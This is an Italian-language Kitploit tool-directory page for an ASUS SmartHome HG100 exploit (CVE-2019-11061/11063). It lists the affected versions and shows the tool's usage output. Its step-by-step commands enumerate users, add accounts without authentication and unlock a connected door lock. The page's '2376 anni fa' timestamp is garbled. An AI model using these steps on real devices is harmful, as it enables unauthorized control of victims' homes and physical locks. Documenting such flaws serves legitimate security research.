Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ASUS-SmartHome-Exploit — Exploit ASUS SmartHome per CVE-2019-11061 e CVE-2019-11063 | Kitploit
Strumenti/GitHubGitHub/tim124058/asus-smarthome-exploit
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubtim124058/asus-smarthome-exploit

ASUS-SmartHome-Exploit

Exploit ASUS SmartHome per CVE-2019-11061 e CVE-2019-11063

Vedi Repository
2376 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ASUS-SmartHome-Exploit

ID CVE

CVE-2019-11061 : Controllo di accesso non funzionante in HG100

Prodotti interessati : ASUS SmartHome Gateway HG100 versione firmware < 4.00.09

CVE-2019-11063 : Controllo di accesso non funzionante nell'app SmartHome

Prodotti interessati : ASUS SmartHome Android APP versione < 3.0.45_190701

Descrizione

Se l'attaccante si trova sulla stessa rete interna dell'HG100 o di un dispositivo mobile con l'APP companion (android o iPhone). L'attaccante può inviare loro richieste di controllo.

L'attaccante non ha quindi bisogno di alcuna autenticazione per fare quanto segue:
1. Ottenere tutti i nomi utente aggiunti all'HG100.
2. Ottenere le informazioni di tutti i dispositivi sotto lo SmartHome Gateway(HG100).
3. Controllare tutti i dispositivi controllabili (es. DoorLock, Meter Plug ...) sotto lo SmartHome Gateway.
Le seguenti operazioni richiedono la password (da 4 a 6 cifre, predefinita: "0000") :
1. Aggiungere utenti all'HG100.

Utilizzo dell'exploit:

scansiona la porta sfruttabile :

root@kitploit:~
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

invia un comando al target :

root@kitploit:~
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Nota: 2019/5/15 - ASUS ha rilasciato un aggiornamento per SmartHome APP(3.0.42_190515) e Gateway(4.00.06). E ha aggiunto SSL al servizio HTTP. Ma questa vulnerabilità esiste ancora. Per questo aggiornamento, è necessario specificare il protocollo quando si usa l'argomento "cmd". Per esempio:
root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -l

Esempio di utilizzo:

Passo 1:

Scansiona la porta sfruttabile del dispositivo mobile (con l'APP companion per android o iPhone installata) :
porta app P.S. L'opzione -v elencherà gli utenti aggiunti all'HG100.

oppure

Scansiona la porta sfruttabile dell'HG100 :
porta HG100

Passo 2:

Ottieni tutti gli utenti aggiunti all'HG100: lista utenti

oppure aggiungine uno nuovo: aggiungi utente

Nota: usa https://10.42.50.166:8083 per l'argomento "cmd".
Per esempio:

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -u

Passo 3:

Ottieni le informazioni di tutti i dispositivi sotto lo SmartHome Gateway: lista dispositivi P.S. Se l'opzione --user non è impostata, verrà selezionato automaticamente il primo utente nell'HG100. (Perché non è necessaria alcuna password)

Confronto con l'app:


Passo 4:

Controlla (sblocca) il DoorLock. controlla dispositivo P.S. il valore 1028 si ottiene dall'opzione -l (passo 3).

Risultato:

Scarica lo strumento